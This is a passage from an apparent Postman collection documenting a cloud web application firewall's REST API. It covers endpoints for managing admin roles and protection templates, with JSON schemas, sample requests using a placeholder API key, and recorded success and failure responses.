details.</b></b></p>\n</blockquote>\n","urlObject":{"protocol":"https","path":["v1","role"],"host":["api","tim","waasonline","com"],"query":[],"variable":[]}},"response":[{"id":"8a1619ad-d3bb-4c24-aae4-ab19e89e22dc","name":"Fail","originalRequest":{"method":"POST","header":[{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"}],"body":{"mode":"raw","raw":"{\r\n\t\"type\":\"tenant-or-admin\",\r\n\t\"name\":\"user-defined-role-name\",\r\n\t\"description\":\"role-description\",\r\n\t\"policy\":{\r\n\t\t\"/application\":\"rw\",\r\n\t\t\"/application/ep-id-1\":\"ro\",\r\n\t\t\"/application/ep-id-2\":\"rw\",\r\n\t\t\"/template\":\"rw\",\r\n\t\t\"/elog\":\"rw\",\r\n\t\t\"/admin\":\"ro\",\r\n\t\t\"/role\":\"ro\",\r\n\t\t\"/global-setting\":\"rw\",\r\n\t\t\"/mssp/tenant\":\"rw\",\r\n\t\t\"/mssp/contracts\":\"rw\"\r\n\t\t}\r\n}","options":{"raw":{"language":"json"}}},"url":"https://api.tim.waasonline.com/v1/role"},"_postman_previewlanguage":"json","header":[],"cookie":[],"responseTime":null,"body":"{\n    \"message\": \"The cause of the failure\"\n}"},{"id":"afe10b17-381f-4dde-ae09-6dbcf880a12d","name":"Success","originalRequest":{"method":"POST","header":[{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"}],"body":{"mode":"raw","raw":"{\r\n\t\"type\":\"tenant-or-admin\",\r\n\t\"name\":\"user-defined-role-name\",\r\n\t\"description\":\"role-description\",\r\n\t\"policy\":{\r\n\t\t\"/application\":\"rw\",\r\n\t\t\"/application/ep-id-1\":\"ro\",\r\n\t\t\"/application/ep-id-2\":\"rw\",\r\n\t\t\"/template\":\"rw\",\r\n\t\t\"/elog\":\"rw\",\r\n\t\t\"/admin\":\"ro\",\r\n\t\t\"/role\":\"ro\",\r\n\t\t\"/global-setting\":\"rw\",\r\n\t\t\"/mssp/tenant\":\"rw\",\r\n\t\t\"/mssp/contracts\":\"rw\"\r\n\t\t}\r\n}","options":{"raw":{"language":"json"}}},"url":"https://api.tim.waasonline.com/v1/role"},"_postman_previewlanguage":"json","header":[],"cookie":[],"responseTime":null,"body":"{\n    \"message\": \"Success\"\n}"}],"_postman_id":"67c272b9-dd10-4282-9304-9904b51ffdf0"},{"name":"Update User Role","id":"9a7e1273-7db9-4759-923e-f8434359daeb","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"PUT","header":[{"key":"Content-Type","name":"Content-Type","type":"text","value":"application/json"},{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"},{"key":"Accept","type":"text","value":"application/json"}],"body":{"mode":"raw","raw":"{\n\t\t\"name\":\"new-role-name\",\n\t\t\"description\":\"role-description\",\n\t\t\"policy\":{\n\t\t\t\"/application\":\"rw\",\n\t\t\t\"/application/ep-id-1\":\"ro\",\n\t\t\t\"/application/ep-id-2\":\"rw\",\n\t\t\t\"/template\":\"rw\",\n\t\t\t\"/elog\":\"rw\",\n\t\t\t\"/admin\":\"ro\",\n\t\t\t\"/role\":\"ro\",\n\t\t\t\"/global-setting\":\"rw\",\n\t\t\t\"/mssp/tenant\":\"rw\",\n\t\t\t\"/mssp/contracts\":\"rw\"\n\t\t\t}\n}"},"url":"https://api.tim.waasonline.com/v1/role/:name","description":"<p>Update the configuration of the admin user.</p>\n<p>A body including all parameters and values in the request that conforms to the following JSON schema:</p>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">{\n    \"type\": \"object\",\n    \"required\": [\"name\", \"description\", \"policy\"],\n    \"properties\": {\n        \"name\": {\n            \"description\": \"New role name\",\n            \"type\": \"string\"\n        },\n        \"description\": {\n            \"description\": \"Role description\",\n            \"type\": \"string\"\n        },\n        \"policy\": {\n            \"description\": \"Role policy detail\",\n            \"type\": \"object\"\n        }\n    }\n}\n</code></pre>\n<blockquote>\n<p>Requires API key secret as <code>Authorization</code> request header. See <b>Request format<b> section for API key secret details.</b></b></p>\n</blockquote>\n","urlObject":{"protocol":"https","path":["v1","role",":name"],"host":["api","tim","waasonline","com"],"query":[],"variable":[{"description":{"content":"<p>Role name</p>\n","type":"text/plain"},"type":"string","value":"","key":"name"}]}},"response":[{"id":"423564b6-d019-4ff3-9557-4920df4eb12f","name":"Success","originalRequest":{"method":"PUT","header":[{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"}],"body":{"mode":"raw","raw":"{\r\n\t\t\"name\":\"new-role-name\",\r\n\t\t\"description\":\"role-description\",\r\n\t\t\"policy\":{\r\n\t\t\t\"/application\":\"rw\",\r\n\t\t\t\"/application/ep-id-1\":\"ro\",\r\n\t\t\t\"/application/ep-id-2\":\"rw\",\r\n\t\t\t\"/template\":\"rw\",\r\n\t\t\t\"/elog\":\"rw\",\r\n\t\t\t\"/admin\":\"ro\",\r\n\t\t\t\"/role\":\"ro\",\r\n\t\t\t\"/global-setting\":\"rw\",\r\n\t\t\t\"/mssp/tenant\":\"rw\",\r\n\t\t\t\"/mssp/contracts\":\"rw\"\r\n\t\t\t}\r\n}","options":{"raw":{"language":"json"}}},"url":{"raw":"https://api.tim.waasonline.com/v1/role/:name","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","role",":name"],"variable":[{"key":"name","value":""}]}},"_postman_previewlanguage":"json","header":[],"cookie":[],"responseTime":null,"body":"{\n    \"message\": \"Success\"\n}"},{"id":"67664963-3e9c-4a80-8a5a-00106bd6b7f6","name":"Fail","originalRequest":{"method":"PUT","header":[{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"}],"body":{"mode":"raw","raw":"{\r\n\t\t\"name\":\"new-role-name\",\r\n\t\t\"description\":\"role-description\",\r\n\t\t\"policy\":{\r\n\t\t\t\"/application\":\"rw\",\r\n\t\t\t\"/application/ep-id-1\":\"ro\",\r\n\t\t\t\"/application/ep-id-2\":\"rw\",\r\n\t\t\t\"/template\":\"rw\",\r\n\t\t\t\"/elog\":\"rw\",\r\n\t\t\t\"/admin\":\"ro\",\r\n\t\t\t\"/role\":\"ro\",\r\n\t\t\t\"/global-setting\":\"rw\",\r\n\t\t\t\"/mssp/tenant\":\"rw\",\r\n\t\t\t\"/mssp/contracts\":\"rw\"\r\n\t\t\t}\r\n}","options":{"raw":{"language":"json"}}},"url":{"raw":"https://api.tim.waasonline.com/v1/role/:name","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","role",":name"],"variable":[{"key":"name","value":""}]}},"_postman_previewlanguage":"json","header":[],"cookie":[],"responseTime":null,"body":"{\n    \"message\": \"The cause of the failure\"\n}"}],"_postman_id":"9a7e1273-7db9-4759-923e-f8434359daeb"},{"name":"Delete User Role","id":"d314acc6-f141-420a-ac1c-c782748c6828","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"DELETE","header":[{"key":"Accept","type":"text","value":"application/json"},{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"}],"url":"https://api.tim.waasonline.com/v1/role/:name","description":"<p>Delete an admin user.</p>\n<blockquote>\n<p>Requires API key secret as <code>Authorization</code> request header. See <b>Request format<b> section for API key secret details.</b></b></p>\n</blockquote>\n","urlObject":{"protocol":"https","path":["v1","role",":name"],"host":["api","tim","waasonline","com"],"query":[{"disabled":true,"key":"","value":""}],"variable":[{"description":{"content":"<p>Role name</p>\n","type":"text/plain"},"type":"string","value":"","key":"name"}]}},"response":[{"id":"9cd52bdf-3beb-48eb-a313-67060583a531","name":"Success","originalRequest":{"method":"DELETE","header":[],"url":{"raw":"https://api.tim.waasonline.com/v1/role/:name","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","role",":name"],"variable":[{"key":"name","value":""}]}},"_postman_previewlanguage":"json","header":[],"cookie":[],"responseTime":null,"body":"{\n    \"message\": \"Success\"\n}"},{"id":"dc9a0f43-e3ef-4be7-8d78-b9436edd6f15","name":"Fail","originalRequest":{"method":"DELETE","header":[],"url":{"raw":"https://api.tim.waasonline.com/v1/role/:name","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","role",":name"],"variable":[{"key":"name","value":""}]}},"_postman_previewlanguage":"json","header":[],"cookie":[],"responseTime":null,"body":"{\n    \"message\": \"The cause of the failure\"\n}"}],"_postman_id":"d314acc6-f141-420a-ac1c-c782748c6828"}],"id":"406a08c0-7cb9-40f2-8e39-968aa2cec289","description":"<p>This section covers information about admin users.</p>\n","event":[{"listen":"prerequest","script":{"type":"text/javascript","exec":[""],"id":"f3c4c06c-bf49-4a90-a63b-3b6334aff902"}},{"listen":"test","script":{"type":"text/javascript","exec":[""],"id":"054c251a-d4a5-45e3-8b7b-403eca2638dd"}}],"_postman_id":"406a08c0-7cb9-40f2-8e39-968aa2cec289"},{"name":"Template Settings","item":[{"name":"Get Template List","id":"ba2daf94-1ffe-4816-8886-8c0a42252f25","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"},{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"}],"body":{"mode":"raw","raw":""},"url":"https://api.tim.waasonline.com/v1/template","description":"<p>Get the information of the user's templates.</p>\n<blockquote>\n<p>Requires API key secret as <code>Authorization</code> request header. See <b>Request format<b> section for API key secret details.</b></b></p>\n</blockquote>\n","urlObject":{"protocol":"https","path":["v1","template"],"host":["api","tim","waasonline","com"],"query":[],"variable":[]}},"response":[{"id":"4426f4da-e764-4a22-b106-275c95df776c","name":"Success","originalRequest":{"method":"GET","header":[{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"},{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"}],"url":"https://api.tim.waasonline.com/v1/template"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Fri, 21 Feb 2020 02:55:33 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"2032"},{"key":"Connection","value":"keep-alive"},{"key":"x-amzn-RequestId","value":"3c2cb267-00ef-4445-8099-63dc4097bf4a"},{"key":"Access-Control-Allow-Origin","value":""},{"key":"x-amz-apigw-id","value":"IOf5wH6oyQ0FRTA="},{"key":"X-Amzn-Trace-Id","value":"Root=1-5e4f46a4-765ac2b0ab8b5b9086e883f8;Sampled=0"}],"cookie":[],"responseTime":null,"body":"{\n    \"detail\": \"successfully\",\n    \"result\": [\n        {\n            \"template_id\": \"d1f0e0e6-6e8a-5659-aef2-0018d3a13b10\",\n            \"name\": \"Drupal\",\n            \"features\": [\n                \"botdetection\",\n                \"RequestLimits\",\n                \"ddosprevention\",\n                \"FileProtection\",\n                \"knownattacks\",\n                \"IPProtection\",\n                \"customrule\"\n            ],\n            \"predefine\": true,\n            \"endpoints\": []\n        },\n        {\n            \"template_id\": \"bc4c9369-ba48-5b30-81f7-95483fc089ba\",\n            \"name\": \"Exchange\",\n            \"features\": [\n                \"botdetection\",\n                \"RequestLimits\",\n                \"ddosprevention\",\n                \"FileProtection\",\n                \"knownattacks\",\n                \"IPProtection\",\n                \"customrule\"\n            ],\n            \"predefine\": true,\n            \"endpoints\": []\n        },\n        {\n            \"template_id\": \"fc5260ec-4853-547d-90ba-d8c4acc9746f\",\n            \"name\": \"ExtendedProtection\",\n            \"features\": [\n                \"botdetection\",\n                \"biometricsbaseddetection\",\n                \"RequestLimits\",\n                \"ddosprevention\",\n                \"httpheadersecurity\",\n                \"CookieSecurity\",\n                \"FileProtection\",\n                \"knownattacks\",\n                \"IPProtection\",\n                \"customrule\",\n                \"informationleakage\"\n            ],\n            \"predefine\": true,\n            \"endpoints\": []\n        },\n        {\n            \"template_id\": \"2eb3d56f-1ae9-5b4c-80b0-bb7f08f806a2\",\n            \"name\": \"SharePoint\",\n            \"features\": [\n                \"botdetection\",\n                \"RequestLimits\",\n                \"ddosprevention\",\n                \"FileProtection\",\n                \"knownattacks\",\n                \"IPProtection\",\n                \"customrule\"\n            ],\n            \"predefine\": true,\n            \"endpoints\": []\n        },\n        {\n            \"template_id\": \"030c3362-b126-5a07-bf59-83c34d7ea0cc\",\n            \"name\": \"StandardProtection\",\n            \"features\": [\n                \"botdetection\",\n                \"RequestLimits\",\n                \"ddosprevention\",\n                \"FileProtection\",\n                \"knownattacks\",\n                \"IPProtection\",\n                \"customrule\"\n            ],\n            \"predefine\": true,\n            \"endpoints\": [\n                [\n                    \"3665475671\",\n                    \"test11.saas-waf.xyz\",\n                    \"test11.saas-waf.xyz\"\n                ]\n            ]\n        },\n        {\n            \"template_id\": \"4f37d570-a2c0-57a8-9dd1-443292f7f88e\",\n            \"name\": \"Wordpress\",\n            \"features\": [\n                \"botdetection\",\n                \"RequestLimits\",\n                \"ddosprevention\",\n                \"FileProtection\",\n                \"knownattacks\",\n                \"IPProtection\",\n                \"customrule\"\n            ],\n            \"predefine\": true,\n            \"endpoints\": []\n        },\n        {\n            \"template_id\": \"96ba6bcc-0024-56fd-8dee-22ad835c216d\",\n            \"name\": \"Template\",\n            \"features\": [\n                \"RequestLimits\",\n                \"ddosprevention\",\n                \"knownattacks\"\n            ],\n            \"predefine\": false,\n            \"endpoints\": []\n        }\n    ],\n    \"total\": 7,\n    \"user_perm\": \"rw\"\n}"}],"_postman_id":"ba2daf94-1ffe-4816-8886-8c0a42252f25"},{"name":"Create Template","id":"1de77c59-371d-4b4e-a724-a2cec61002dc","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[{"description":"<p>Token</p>\n","key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"},{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"}],"body":{"mode":"raw","raw":"{\"endpoints\":[\"2700465310\"],\"name\":\"template-name\"}"},"url":"https://api.tim.waasonline.com/v1/template","description":"<p>Create a new template.</p>\n<p>A body including all parameters and values in the request that conforms to the following JSON schema:</p>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">\n{\n    \"type\": \"object\",\n    \"properties\": {\n    \n        \"endpoints\": {\n            \"description\": \"The template has been bound to applications\",\n            \"type\": \"array\",\n            \"maxItems\": 16,\n            \"items\": {\n                \"description\": \"The application ID\",\n                \"type\": \"string\",\n                \"length\": 10\n            }\n        },\n        \"name\": {\n            \"description\": \"The template name\",\n            \"type\": \"string\",\n            \"maxLength\": 128\n        }\n    }\n}\n \n</code></pre>\n<blockquote>\n<p>Requires API key secret as <code>Authorization</code> request header. See <b>Request format<b> section for API key secret details.</b></b></p>\n</blockquote>\n","urlObject":{"protocol":"https","path":["v1","template"],"host":["api","tim","waasonline","com"],"query":[],"variable":[]}},"response":[{"id":"b30f1cd0-ac05-49c9-b6a1-8c25f1919029","name":"Success","originalRequest":{"method":"POST","header":[{"description":"Token","key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"},{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"}],"body":{"mode":"raw","raw":"{\"endpoints\":[\"2700465310\"],\"name\":\"template-name\"}"},"url":"https://api.tim.waasonline.com/v1/template"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Fri, 21 Feb 2020 03:09:04 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"183"},{"key":"Connection","value":"keep-alive"},{"key":"x-amzn-RequestId","value":"8d85270c-8bec-4f65-aebe-8ca788977468"},{"key":"Access-Control-Allow-Origin","value":""},{"key":"x-amz-apigw-id","value":"IOh3vFlxSQ0FV1Q="},{"key":"X-Amzn-Trace-Id","value":"Root=1-5e4f49cb-68c9ddd006431fd8291ebf0c;Sampled=0"}],"cookie":[],"responseTime":null,"body":"{\n    \"detail\": \"successfully\",\n    \"result\": {\n        \"template_id\": \"bd45f3d5-7388-5df8-a514-75c354e81b2b\",\n        \"name\": \"template-name\",\n        \"features\": [\n            \"knownattacks\",\n            \"RequestLimits\",\n            \"ddosprevention\"\n        ]\n    }\n}"}],"_postman_id":"1de77c59-371d-4b4e-a724-a2cec61002dc"},{"name":"Delete Template","id":"2ba0290a-54e9-4d5b-b84f-5766fce01abb","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"DELETE","header":[{"description":"<p>Token</p>\n","key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"},{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"},{"key":"","value":"","type":"text"}],"body":{"mode":"raw","raw":""},"url":"https://api.tim.waasonline.com/v1/template/:template_id","description":"<p>Delete the template configurations.</p>\n<p>After you update the configuration, the API will return successfully.</p>\n<blockquote>\n<p>Requires API key secret as <code>Authorization</code> request header. See <b>Request format<b> section for API key secret details.</b></b></p>\n</blockquote>\n","urlObject":{"protocol":"https","path":["v1","template",":template_id"],"host":["api","tim","waasonline","com"],"query":[],"variable":[{"description":{"content":"<p>The template ID.</p>\n","type":"text/plain"},"type":"string","value":"{{template_id}}","key":"template_id"}]}},"response":[{"id":"077145d9-0e8b-4ec6-ba00-6f4b62bc81d4","name":"Success","originalRequest":{"method":"DELETE","header":[{"description":"Token","key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"},{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"},{"key":"","value":"","type":"text"}],"body":{"mode":"raw","raw":"{\n\n    \"_status\": \"enable\",\n    \"CookieSecurity\": {\n        \"security-mode\": \"encrypted\",\n        \"http-only\": \"enable\",\n        \"secure-cookie\": \"disable\",\n        \"max-age\": 0,\n        \"action\": \"alert_deny\",\n        \"cookie-replay-protection-type\": \"no\",\n        \"cookie-security-exception-list\": [{\n                \"cookie-name\": \"__utma\"\n         }],\n        \"allow-suspicious-cookies\": \"Always\"\n    }\n}"},"url":{"raw":"https://api.tim.waasonline.com/v1/template/:template_id","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","template",":template_id"],"variable":[{"key":"template_id","value":"{{template_id}}"}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Fri, 21 Feb 2020 07:34:16 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"26"},{"key":"Connection","value":"keep-alive"},{"key":"x-amzn-RequestId","value":"4d4c629e-1c66-4e9a-8c34-5425be03be5f"},{"key":"Access-Control-Allow-Origin","value":""},{"key":"x-amz-apigw-id","value":"IPIunEbFyQ0FQ3Q="},{"key":"X-Amzn-Trace-Id","value":"Root=1-5e4f87f7-2addb60000cba806e847efa0;Sampled=0"}],"cookie":[],"responseTime":null,"body":"{\n    \"detail\": \"successfully\"\n}"}],"_postman_id":"2ba0290a-54e9-4d5b-b84f-5766fce01abb"},{"name":"Get Template Module Config","id":"659a2089-3bb2-4deb-9d94-01ac74736e3d","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"description":"<p>Token</p>\n","key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"},{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"}],"body":{"mode":"raw","raw":""},"url":"https://api.tim.waasonline.com/v1/template/:template_id/:module","description":"<p>Get the configuration of template module.</p>\n<blockquote>\n<p>Requires API key secret as <code>Authorization</code> request header. See <b>Request format<b> section for API key secret details.</b></b></p>\n</blockquote>\n","urlObject":{"protocol":"https","path":["v1","template",":template_id",":module"],"host":["api","tim","waasonline","com"],"query":[],"variable":[{"description":{"content":"<p>The template ID.</p>\n","type":"text/plain"},"type":"string","value":"{{template_id}}","key":"template_id"},{"description":{"content":"<p>The module name.</p>\n","type":"text/plain"},"type":"string","value":"{{module}}","key":"module"}]}},"response":[{"id":"8defd53c-4829-493d-b8e1-c56cde3ebe70","name":"Template (Cookie Security module)","originalRequest":{"method":"GET","header":[{"description":"Token","key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"},{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"}],"url":{"raw":"https://api.tim.waasonline.com/v1/template/:template_id/:module","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","template",":template_id",":module"],"variable":[{"key":"template_id","value":"{{template_id}}"},{"key":"module","value":"cookiesecurity"}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Fri, 21 Feb 2020 07:20:04 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"920"},{"key":"Connection","value":"keep-alive"},{"key":"x-amzn-RequestId","value":"90f6b1f1-e4db-48f5-ba19-497a20111d38"},{"key":"Access-Control-Allow-Origin","value":""},{"key":"x-amz-apigw-id","value":"IPGpEHcVSQ0FndQ="},{"key":"X-Amzn-Trace-Id","value":"Root=1-5e4f84a0-956537606eb44e375ca6759d;Sampled=0"}],"cookie":[],"responseTime":null,"body":"{\n    \"detail\": \"successfully\",\n    \"result\": {\n        \"_status\": \"disable\",\n        \"CookieSecurity\": {\n            \"security-mode\": \"signed\",\n            \"http-only\": \"disable\",\n            \"secure-cookie\": \"disable\",\n            \"max-age\": 0,\n            \"action\": \"alert_deny\",\n            \"cookie-replay-protection-type\": \"no\",\n            \"cookie-security-exception-list\": [\n                {\n                    \"cookie-name\": \"__utma\"\n                },\n                {\n                    \"cookie-name\": \"__utmb\"\n                },\n                {\n                    \"cookie-name\": \"__utmc\"\n                },\n                {\n                    \"cookie-name\": \"__utmz\"\n                },\n                {\n                    \"cookie-name\": \"__utmv\"\n                },\n                {\n                    \"cookie-name\": \"__utmx\"\n                },\n                {\n                    \"cookie-name\": \"__RequestVerificationToken\"\n                },\n                {\n                    \"cookie-name\": \"__RequestVerificationToken_Lw__\"\n                },\n                {\n                    \"cookie-name\": \"CoreID6\"\n                },\n                {\n                    \"cookie-name\": \"BDSVRTM\"\n                },\n                {\n                    \"cookie-name\": \"X-BackEndCookie\"\n                },\n                {\n                    \"cookie-name\": \"X-OWA-CANARY\"\n                },\n                {\n                    \"cookie-name\": \"ASPSESSIONID\"\n                },\n                {\n                    \"cookie-name\": \"PHPSESSID\"\n                },\n                {\n                    \"cookie-name\": \"JSESSIONID\"\n                },\n                {\n                    \"cookie-name\": \"ASP.NET_SessionId\"\n                },\n                {\n                    \"cookie-name\": \"adAuthCookie\"\n                },\n                {\n                    \"cookie-name\": \"unique2u\"\n                }\n            ],\n            \"allow-suspicious-cookies\": \"Always\"\n        },\n        \"template_status\": \"disable\"\n    }\n}"}],"_postman_id":"659a2089-3bb2-4deb-9d94-01ac74736e3d"},{"name":"Update Template","id":"23e6680d-cbca-47aa-a504-20d0cd7e3157","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"PUT","header":[{"description":"<p>Token</p>\n","key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"},{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"}],"body":{"mode":"raw","raw":"{\"endpoints\":[\"2700465310\"],\"name\":\"template-name\"}"},"url":"https://api.tim.waasonline.com/v1/template/:template_id","description":"<p>Update the template configuration.</p>\n<p>A body including all parameters and values in the request that conforms to the following JSON schema:</p>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">\n{\n    \"type\": \"object\",\n    \"properties\": {\n    \n        \"endpoints\": {\n            \"description\": \"The template will be bound to applications\",\n            \"type\": \"array\",\n            \"maxItems\": 16,\n            \"items\": {\n                \"description\": \"The application ID\",\n                \"type\": \"string\",\n                \"length\": 10\n            }\n        },\n        \"name\": {\n            \"description\": \"The template name\",\n            \"type\": \"string\",\n            \"maxLength\": 128\n        }\n    }\n}\n \n</code></pre>\n<p>After you update the configuration, the API will return successfully.</p>\n<blockquote>\n<p>Requires API key secret as <code>Authorization</code> request header. See <b>Request format<b> section for API key secret details.</b></b></p>\n</blockquote>\n","urlObject":{"protocol":"https","path":["v1","template",":template_id"],"host":["api","tim","waasonline","com"],"query":[],"variable":[{"description":{"content":"<p>The template ID.</p>\n","type":"text/plain"},"type":"string","value":"{{template_id}}","key":"template_id"}]}},"response":[{"id":"d432f3f3-a487-467a-b698-aae8e361796e","name":"Success","originalRequest":{"method":"PUT","header":[{"description":"Token","key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"},{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"}],"body":{"mode":"raw","raw":"{\"endpoints\":[\"2700465310\"],\"name\":\"template-name\"}","options":{"raw":{"language":"json"}}},"url":{"raw":"https://api.tim.waasonline.com/v1/template/:template_id","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","template",":template_id"],"variable":[{"key":"template_id","value":"{{template_id}}"}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Fri, 21 Feb 2020 03:56:35 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"26"},{"key":"Connection","value":"keep-alive"},{"key":"x-amzn-RequestId","value":"25197ea0-9ef1-4041-9102-e36f61def4be"},{"key":"Access-Control-Allow-Origin","value":""},{"key":"x-amz-apigw-id","value":"IOo17EikyQ0Fmbw="},{"key":"X-Amzn-Trace-Id","value":"Root=1-5e4f54f2-bf1d1a8255469ffd7f4ef429;Sampled=0"}],"cookie":[],"responseTime":null,"body":"{\n    \"detail\": \"successfully\"\n}"}],"_postman_id":"23e6680d-cbca-47aa-a504-20d0cd7e3157"},{"name":"Update Template Module Config","id":"c037f766-eb61-4d8e-9c11-ee2c63a30713","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"PUT","header":[{"description":"<p>Token</p>\n","key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"},{"key":"Content-Type","name":"Content-Type","type":"text","value":"application/json"}],"body":{"mode":"raw","raw":"{\n\n    \"_status\": \"enable\",\n    \"CookieSecurity\": {\n        \"security-mode\": \"encrypted\",\n        \"http-only\": \"enable\",\n        \"secure-cookie\": \"disable\",\n        \"max-age\": 0,\n        \"action\": \"alert_deny\",\n        \"cookie-replay-protection-type\": \"no\",\n        \"cookie-security-exception-list\": [{\n                \"cookie-name\": \"__utma\"\n         }],\n        \"allow-suspicious-cookies\": \"Always\"\n    }\n}"},"url":"https://api.tim.waasonline.com/v1/template/:template_id/:module","description":"<p>Update the configuration information of template module.</p>\n<p>The configurations are quite similiar to the application module configuration, and the differences are the path para template_id and the 'template' section in the path.\nThe template's putting data structure of the module is the same as that of the application.</p>\n<p>The path para module could be the values, cookiesecurity, ddosprevention, fileprotection, requestlimits, botdetection, knownattacks, informationleakage, rewritingrequests, urlaccess, csrfprotection, mitbprotection, httpheadersecurity,\ncachingandcompression, ipprotection, websocketsecurity, xmlprotectionpolicy, apiprotection,customrule, signatureexception, machinelearning and so on.</p>\n<blockquote>\n<p>Requires API key secret as <code>Authorization</code> request header. See <b>Request format<b> section for API key secret details.</b></b></p>\n</blockquote>\n","urlObject":{"protocol":"https","path":["v1","template",":template_id",":module"],"host":["api","tim","waasonline","com"],"query":[],"variable":[{"description":{"content":"<p>The template ID.</p>\n","type":"text/plain"},"type":"string","value":"{{template_id}}","key":"template_id"},{"description":{"content":"<p>The module ID.</p>\n","type":"text/plain"},"type":"string","value":"{{module}}","key":"module"}]}},"response":[{"id":"d553ea9c-916e-48bb-9eff-4db15ad218ff","name":"Template (Cookie Security module)","originalRequest":{"method":"PUT","header":[{"description":"Token","key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"},{"key":"Content-Type","name":"Content-Type","type":"text","value":"application/json"}],"body":{"mode":"raw","raw":"{\n\n    \"_status\": \"enable\",\n    \"CookieSecurity\": {\n        \"security-mode\": \"encrypted\",\n        \"http-only\": \"enable\",\n        \"secure-cookie\": \"disable\",\n        \"max-age\": 0,\n        \"action\": \"alert_deny\",\n        \"cookie-replay-protection-type\": \"no\",\n        \"cookie-security-exception-list\": [{\n                \"cookie-name\": \"__utma\"\n         }],\n        \"allow-suspicious-cookies\": \"Always\"\n    }\n}"},"url":{"raw":"https://api.tim.waasonline.com/v1/template/:template_id/:module","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","template",":template_id",":module"],"variable":[{"key":"template_id","value":"{{template_id}}"},{"key":"module","value":"cookiesecurity"}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Fri, 21 Feb 2020 07:22:44 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"26"},{"key":"Connection","value":"keep-alive"},{"key":"x-amzn-RequestId","value":"ea450044-bb05-4008-9e47-288707a77273"},{"key":"Access-Control-Allow-Origin","value":""},{"key":"x-amz-apigw-id","value":"IPHCkEn9yQ0FqGQ="},{"key":"X-Amzn-Trace-Id","value":"Root=1-5e4f8543-94f8dc17475e9c4289be3f3b;Sampled=0"}],"cookie":[],"responseTime":null,"body":"{\n    \"detail\": \"successfully\"\n}"}],"_postman_id":"c037f766-eb61-4d8e-9c11-ee2c63a30713"},{"name":"Get Template Config","id":"6c6aeaef-5835-426d-ac1f-3444efda9d4f","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"description":"<p>Token</p>\n","key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"},{"key":"Content-Type","name":"Content-Type","type":"text","value":"application/json"}],"body":{"mode":"raw","raw":"{\"endpoints\":[\"2700465310\"],\"name\":\"template-name\"}"},"url":"https://api.tim.waasonline.com/v1/template/:template_id","description":"<p>Get the template configuration.</p>\n<blockquote>\n<p>Requires API key secret as <code>Authorization</code> request header. See <b>Request format<b> section for API key secret details.</b></b></p>\n</blockquote>\n","urlObject":{"protocol":"https","path":["v1","template",":template_id"],"host":["api","tim","waasonline","com"],"query":[],"variable":[{"description":{"content":"<p>The template ID.</p>\n","type":"text/plain"},"type":"string","value":"{{template_id}}","key":"template_id"}]}},"response":[{"id":"8bc21159-3a0f-4bbf-a7fe-f6d3c6498979","name":"Success","originalRequest":{"method":"GET","header":[{"description":"Token","key":"Authorization","type":"text","value":"Basic 